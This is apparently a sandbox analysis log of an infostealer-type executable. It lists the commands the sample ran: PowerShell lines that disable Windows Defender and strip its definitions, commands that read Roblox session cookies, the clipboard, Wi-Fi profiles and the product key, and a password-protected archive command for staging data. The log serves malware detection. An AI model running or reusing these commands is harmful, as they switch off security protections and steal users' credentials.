              Source: program.exe, 00000001.00000002.2121822253.00007FFE11EE6000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs program.exe
              Source: program.exe, 00000001.00000002.2120776807.00007FFE0EB64000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2122667935.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs program.exe
              Source: program.exe, 00000001.00000002.2123115710.00007FFE1A46A000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs program.exe
              Source: program.exe, 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2120983307.00007FFE1152A000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2120574846.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2122455558.00007FFE13218000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2121995089.00007FFE12E1C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2121517959.00007FFE11EB3000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs program.exe
              Source: program.exeBinary or memory string: OriginalFilenameCMSTP.EXE` vs program.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Users\user\Desktop\program.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python313.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9926987474437627
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@164/56@2/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6CAFC GetLastError,FormatMessageW,83_2_00007FF64FE6CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,83_2_00007FF64FE6EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,83_2_00007FF64FE9B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE73144 GetDiskFreeSpaceExW,83_2_00007FF64FE73144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8652:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8876:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_03
              Source: C:\Users\user\Desktop\program.exeMutant created: \Sessions\1\BaseNamedObjects\7
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8204:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8816:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8612:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8680:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9040:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8844:120:WilError_03
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082
              Source: program.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\program.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\program.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: program.exeReversingLabs: Detection: 44%
              Source: program.exeVirustotal: Detection: 46%
              Source: program.exeString found in binary or memory: set-addPolicy
              Source: program.exeString found in binary or memory: id-cmc-addExtensions
              Source: program.exeString found in binary or memory: --help
              Source: program.exeString found in binary or memory: can't send non-None value to a just-started async generator
              Source: program.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: program.exeString found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
              Source: program.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: program.exeString found in binary or memory: can't send non-None value to a just-started coroutine
              Source: C:\Users\user\Desktop\program.exeFile read: C:\Users\user\Desktop\program.exe
              Source: unknownProcess created: C:\Users\user\Desktop\program.exe "C:\Users\user\Desktop\program.exe"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Users\user\Desktop\program.exe "C:\Users\user\Desktop\program.exe"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Users\user\Desktop\program.exe "C:\Users\user\Desktop\program.exe"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
